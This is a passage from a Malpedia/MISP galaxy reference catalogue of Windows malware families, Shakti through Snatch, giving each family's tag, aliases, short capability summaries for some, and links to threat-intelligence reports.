https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/
https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html
https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf
https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf
https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf
https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

Shakti

The tag is: misp-galaxy:malpedia="Shakti"

Shakti is also known as:

Table 2601. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti
https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/
https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/

SHAPESHIFT

The tag is: misp-galaxy:malpedia="SHAPESHIFT"

SHAPESHIFT is also known as:

Table 2602. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

shareip

The tag is: misp-galaxy:malpedia="shareip"

shareip is also known as:

remotecmd

Table 2603. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip
https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

Shark

The tag is: misp-galaxy:malpedia="Shark"

Shark is also known as:

Table 2604. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shark
https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf

SHARPKNOT

The tag is: misp-galaxy:malpedia="SHARPKNOT"

SHARPKNOT is also known as:

Bitrep

Table 2605. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot
https://eromang.zataz.com/tag/agentbase-exe/
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf

SharpStage

The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east.

The tag is: misp-galaxy:malpedia="SharpStage"

SharpStage is also known as:

LastConn

Table 2606. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage
https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign
https://www.0ffset.net/reverse-engineering/malware-analysis/molerats-string-decryption/

SHARPSTATS

The tag is: misp-galaxy:malpedia="SHARPSTATS"

SHARPSTATS is also known as:

Table 2607. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstats
https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf

ShellLocker

The tag is: misp-galaxy:malpedia="ShellLocker"

ShellLocker is also known as:

Table 2608. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker
https://twitter.com/JaromirHorejsi/status/813726714228604928

Shifu

Shifu was originally discovered by Trusteer security researchers (Ilya Kolmanovich, Denis Laskov) in the middle of 2015. It is a banking trojan mostly focusing on Japanese banks and has rich features for remote data extraction and control.

The tag is: misp-galaxy:malpedia="Shifu"

Shifu is also known as:

Table 2609. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan
https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/

Shim RAT

The tag is: misp-galaxy:malpedia="Shim RAT"

Shim RAT is also known as:

Table 2610. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat
https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf
https://www.secureworks.com/research/threat-profiles/bronze-walker

SHIPSHAPE

SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.

The tag is: misp-galaxy:malpedia="SHIPSHAPE"

SHIPSHAPE is also known as:

Table 2611. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Shujin

The tag is: misp-galaxy:malpedia="Shujin"

Shujin is also known as:

Table 2612. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin
https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/

Shurl0ckr

The tag is: misp-galaxy:malpedia="Shurl0ckr"

Shurl0ckr is also known as:

Table 2613. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications

Shylock

The tag is: misp-galaxy:malpedia="Shylock"

Shylock is also known as:

Caphaw

Table 2614. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock
https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/
http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html
https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/
https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware
https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware
https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw

SideTwist

The tag is: misp-galaxy:malpedia="SideTwist"

SideTwist is also known as:

Table 2615. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sidetwist
https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

SideWalk

Shellcode-based malware family that according to ESET Research was likely written by the same authors as win.crosswalk.

The tag is: misp-galaxy:malpedia="SideWalk"

SideWalk is also known as:

ScrambleCross

Table 2616. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk
https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/
https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware

SideWinder

The tag is: misp-galaxy:malpedia="SideWinder"

SideWinder is also known as:

Table 2617. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder
https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html
https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/
https://www.secrss.com/articles/26507
https://s.tencent.com/research/report/659.html
https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/
https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c
https://s.tencent.com/research/report/479.html

Sierra(Alfa,Bravo, …)

The tag is: misp-galaxy:malpedia="Sierra(Alfa,Bravo, …)"

Sierra(Alfa,Bravo, …) is also known as:

Destover

Table 2618. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras
https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks
https://www.secureworks.com/research/threat-profiles/nickel-academy
https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group
https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.us-cert.gov/ncas/alerts/TA14-353A
https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware

Siggen6

The tag is: misp-galaxy:malpedia="Siggen6"

Siggen6 is also known as:

Table 2619. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6

sihost

The tag is: misp-galaxy:malpedia="sihost"

sihost is also known as:

Table 2620. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sihost
https://threatrecon.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists/

Silence

The tag is: misp-galaxy:malpedia="Silence"

Silence is also known as:

TrueBot

Table 2621. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.silence
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/
https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/
https://github.com/Tera0017/TAFOF-Unpacker
http://www.intezer.com/silenceofthemoles/
https://www.group-ib.com/resources/threat-research/silence.html
https://www.youtube.com/watch?v=FttiysUZmDw
https://reaqta.com/2019/01/silence-group-targeting-russian-banks/
https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf
https://securelist.com/the-silence/83009/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf
https://norfolkinfosec.com/some-notes-on-the-silence-proxy/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

Silon

The tag is: misp-galaxy:malpedia="Silon"

Silon is also known as:

Table 2622. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.silon
http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm
http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html

Siluhdur

The tag is: misp-galaxy:malpedia="Siluhdur"

Siluhdur is also known as:

Table 2623. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur

Simda

The tag is: misp-galaxy:malpedia="Simda"

Simda is also known as:

iBank

Table 2624. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.simda
https://www.youtube.com/watch?v=u2HEGDzd8KM
https://blog.trendmicro.com/trendlabs-security-intelligence/simda-a-botnet-takedown/
https://secrary.com/ReversingMalware/iBank/
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

SimpleFileMover

The tag is: misp-galaxy:malpedia="SimpleFileMover"

SimpleFileMover is also known as:

Table 2625. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Sinowal

The tag is: misp-galaxy:malpedia="Sinowal"

Sinowal is also known as:

Anserin
Mebroot
Quarian
Theola
Torpig

Table 2626. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal
https://www.recordedfuture.com/turla-apt-infrastructure/
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf
https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan
https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://securelist.com/apt-trends-report-q2-2020/97937/
https://en.wikipedia.org/wiki/Torpig
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf
https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/

Sisfader

The tag is: misp-galaxy:malpedia="Sisfader"

Sisfader is also known as:

Table 2627. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4

Skimer

The tag is: misp-galaxy:malpedia="Skimer"

Skimer is also known as:

Table 2628. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer
https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf
http://atm.cybercrime-tracker.net/index.php
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html

SkinnyBoy

The tag is: misp-galaxy:malpedia="SkinnyBoy"

SkinnyBoy is also known as:

Table 2629. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.skinnyboy
https://cybergeeks.tech/skinnyboy-apt28/
https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf

skip-2.0

A Microsoft SQL Server backdoor

The tag is: misp-galaxy:malpedia="skip-2.0"

skip-2.0 is also known as:

Table 2630. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20
https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/

Skipper

The tag is: misp-galaxy:malpedia="Skipper"

Skipper is also known as:

Kotel

Table 2631. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper
https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf
https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf
https://www.secureworks.com/research/threat-profiles/iron-hunter
https://securelist.com/shedding-skin-turlas-fresh-faces/88069/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/
https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/

Skyplex

The tag is: misp-galaxy:malpedia="Skyplex"

Skyplex is also known as:

Table 2632. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex

Slave

The tag is: misp-galaxy:malpedia="Slave"

Slave is also known as:

Table 2633. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.slave
https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/

SLICKSHOES

The tag is: misp-galaxy:malpedia="SLICKSHOES"

SLICKSHOES is also known as:

Table 2634. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes
https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/
https://www.us-cert.gov/ncas/analysis-reports/ar20-045b

Slingshot

2012 first sighted
Attack vector via compromised Microtik routers where victim’s got infection when they connect to Microtik router admin software - Winbox
2018 when discovered by Kaspersky Team

Infection Vector - Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer

The tag is: misp-galaxy:malpedia="Slingshot"

Slingshot is also known as:

Table 2635. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot
https://securelist.com/apt-slingshot/84312/
https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf
https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/

Sliver

The tag is: misp-galaxy:malpedia="Sliver"

Sliver is also known as:

Table 2636. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver
https://github.com/BishopFox/sliver

SlothfulMedia

The tag is: misp-galaxy:malpedia="SlothfulMedia"

SlothfulMedia is also known as:

QueenOfClubs

Table 2637. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a
https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/

SLUB

The tag is: misp-galaxy:malpedia="SLUB"

SLUB is also known as:

Table 2638. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.slub
https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf
https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf
https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html
https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/
https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html

smac

The tag is: misp-galaxy:malpedia="smac"

smac is also known as:

speccom

Table 2639. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.smac
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf
https://www.secureworks.com/research/threat-profiles/bronze-express

Smackdown

The tag is: misp-galaxy:malpedia="Smackdown"

Smackdown is also known as:

Table 2640. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.smackdown
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/master/2013/2013.05.20.Operation_Hangover/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf

SManager

The tag is: misp-galaxy:malpedia="SManager"

SManager is also known as:

PhantomNet

Table 2641. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager
https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4
https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html
https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214
https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1
https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html
https://blog.group-ib.com/task
https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/
https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager
https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html
https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/

SmartEyes

The tag is: misp-galaxy:malpedia="SmartEyes"

SmartEyes is also known as:

Table 2642. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes
https://www.virustotal.com/gui/file/4eb840617883bf6ed7366242ffee811ad5ea3d5bfd2a589a96d6ee9530690d28/details

SMAUG

Ransomware.

The tag is: misp-galaxy:malpedia="SMAUG"

SMAUG is also known as:

Table 2643. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug
https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service
https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

SmokeLoader

The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.

The tag is: misp-galaxy:malpedia="SmokeLoader"

SmokeLoader is also known as:

Dofoil
Sharik
Smoke
Smoke Loader

Table 2644. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/
https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a
https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/
https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign
https://research.checkpoint.com/2019-resurgence-of-smokeloader/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe
https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/
http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/
https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/
https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view
https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html
https://hatching.io/blog/tt-2020-08-27/
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886
https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/
https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/
https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/
https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis
https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/
https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait
https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html
http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html
https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries
https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html
https://www.cert.pl/en/news/single/dissecting-smoke-loader/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/
https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/
https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/
https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/
https://x0r19x91.in/malware-analysis/smokeloader/

Smominru

The tag is: misp-galaxy:malpedia="Smominru"

Smominru is also known as:

Ismo

Table 2645. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru
https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators
http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/

Smrss32

Ransomware.

The tag is: misp-galaxy:malpedia="Smrss32"

Smrss32 is also known as:

Table 2646. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32
https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/
https://www.youtube.com/watch?v=7gCU31ScJgk

Sn0wsLogger

The tag is: misp-galaxy:malpedia="Sn0wsLogger"

Sn0wsLogger is also known as:

Table 2647. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sn0wslogger
https://twitter.com/struppigel/status/1354806038805897216

Snake

Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5 character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. This ransomware is reported to target an entire network, rather than individual workstations.

The tag is: misp-galaxy:malpedia="Snake"

Snake is also known as:

EKANS
SNAKEHOSE

Table 2648. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.snake
https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware
https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems
https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf
https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/
https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md
https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/
https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html
https://www.goggleheadedhacker.com/blog/post/22
https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/
https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf
https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/
https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/
https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html
https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/
https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html
https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/
https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017
https://twitter.com/bad_packets/status/1270957214300135426
https://twitter.com/milkr3am/status/1270019326976786432

Snatch

Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode so that it the malware can act without expected countermeasures and it can encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.

The tag is: misp-galaxy:malpedia="Snatch"

Snatch is also known as:

Table 2649. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch
https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/
https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://thedfirreport.com/2020/06/21/snatch-ransomware/
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md
